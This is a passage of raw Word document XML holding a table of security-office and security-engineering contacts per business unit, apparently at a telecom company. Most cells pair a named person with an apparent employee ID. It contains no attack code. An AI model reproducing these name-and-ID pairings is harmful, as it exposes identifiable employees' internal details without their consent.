          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2123"/>
        <w:gridCol w:w="2143"/>
        <w:gridCol w:w="2613"/>
        <w:gridCol w:w="1810"/>
      </w:tblGrid>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b/>
                <w:bCs/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>BU</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b/>
                <w:bCs/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>BU安全办公室接口人</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b/>
                <w:bCs/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>BU安全工程部</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>问题排查</w:t>
            </w:r>
            <w:r w:rsidRPr="005949A3">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>接口人</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
          </w:tcPr>
          <w:p w:rsidR="00331826" w:rsidRPr="005949A3" w:rsidRDefault="00331826" w:rsidP="00331826">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap w:val="0"/>
              <w:spacing w:line="323" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005949A3">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>BU安全工程</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="005949A3">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>部</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>安全</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>设计</w:t>
            </w:r>
            <w:r w:rsidR="006F144E">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>支撑</w:t>
            </w:r>
            <w:r w:rsidRPr="005949A3">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>接口人</w:t>
            </w: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无线产品线</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proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>董继征</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> 124634</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08A8">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>胡占锋 239612</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00331826" w:rsidRPr="005908A8" w:rsidRDefault="00331826" w:rsidP="00303753">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap w:val="0"/>
              <w:spacing w:line="323" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>胡占锋</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> 239612</w:t>
            </w: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固定网络产品线</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hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>王勋</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> 215758</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9A6549">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>吴涛</w:t>
            </w:r>
            <w:r w:rsidRPr="009A6549">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> 230603</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00331826" w:rsidRPr="009A6549" w:rsidRDefault="00331826" w:rsidP="00303753">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap w:val="0"/>
              <w:spacing w:line="323" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>魏建雄</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> 222905</w:t>
            </w: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电信软件业务部</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hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>廖兴亚</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> 239334</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5908A8">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap w:val="0"/>
              <w:spacing w:line="323" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00331826">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>肖湘 289145</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00331826" w:rsidRPr="005949A3" w:rsidRDefault="00331826" w:rsidP="005908A8">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap w:val="0"/>
              <w:spacing w:line="323" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>姚辉</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> 195967</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000D3A5F" w:rsidRPr="005949A3" w:rsidTr="001A4267">
        <w:trPr>
          <w:trHeight w:val="359"/>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proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="005949A3">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>核心网产品</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="005949A3">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>线</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2123" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>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hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>柳林红</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> 256470</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2593" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00331826" w:rsidRPr="005949A3" w:rsidRDefault="00331826" w:rsidP="005908A8">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李方展</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00331826">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>302306</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00331826" w:rsidRPr="005949A3" w:rsidRDefault="00331826" w:rsidP="005908A8">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap w:val="0"/>
              <w:spacing w:line="323" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>李方展</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> 302306</w:t>
            </w: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网络能源产品线</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hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>蒋滔</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> 117283</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5908A8">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap w:val="0"/>
              <w:spacing w:line="323" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005908A8">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>詹松烈 173034</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00331826" w:rsidRPr="005908A8" w:rsidRDefault="00331826" w:rsidP="005908A8">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap w:val="0"/>
              <w:spacing w:line="323" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>詹松烈</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> 173034</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000D3A5F" w:rsidRPr="005949A3" w:rsidTr="001A4267">
        <w:trPr>
          <w:trHeight w:val="431"/>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交换机与企业通信产品线</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hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>刘俊华</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> 118090</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5908A8">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap w:val="0"/>
              <w:spacing w:line="323" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00331826">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>王瑾 90003828</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00331826" w:rsidRPr="005949A3" w:rsidRDefault="00331826" w:rsidP="005908A8">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap w:val="0"/>
              <w:spacing w:line="323" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>杨志成</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> 175422</w:t>
            </w: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IT产品线</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hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>欧日军</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> 246947</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5908A8">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap w:val="0"/>
              <w:spacing w:line="323" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005908A8">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>李世亮 90005514</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00331826" w:rsidRPr="005908A8" w:rsidRDefault="00331826" w:rsidP="005908A8">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap w:val="0"/>
              <w:spacing w:line="323" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>徐秀兰</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> 301387</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000D3A5F" w:rsidRPr="005949A3" w:rsidTr="001A4267">
        <w:trPr>
          <w:trHeight w:val="133"/>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ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>SPO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2123" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>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Pr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>李丹娜</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> 330333</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08A8">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>张宁 238449</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00331826" w:rsidRPr="005908A8" w:rsidRDefault="00331826" w:rsidP="00303753">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap w:val="0"/>
              <w:spacing w:line="323" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>张宁</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> 238449</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000D3A5F" w:rsidRPr="005949A3" w:rsidTr="001A4267">
        <w:trPr>
          <w:trHeight w:val="351"/>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hint="eastAsia"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>鼎桥</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2123" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>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hint="eastAsia"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>周童</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> WX36170</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hint="eastAsia"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00331826">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>闫锐 WX10467</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00331826" w:rsidRPr="005949A3" w:rsidRDefault="00331826" w:rsidP="00303753">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap w:val="0"/>
              <w:spacing w:line="323" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>闫锐</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> WX10467</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000D3A5F" w:rsidRPr="005949A3" w:rsidTr="001A4267">
        <w:trPr>
          <w:trHeight w:val="570"/>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2012-中央软件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2123" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>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魏巍 00256168</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王海涛00203029</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
          </w:tcPr>
          <w:p w:rsidR="00331826" w:rsidRPr="005949A3" w:rsidRDefault="00331826" w:rsidP="00303753">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap w:val="0"/>
              <w:spacing w:line="323" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="333333"/>
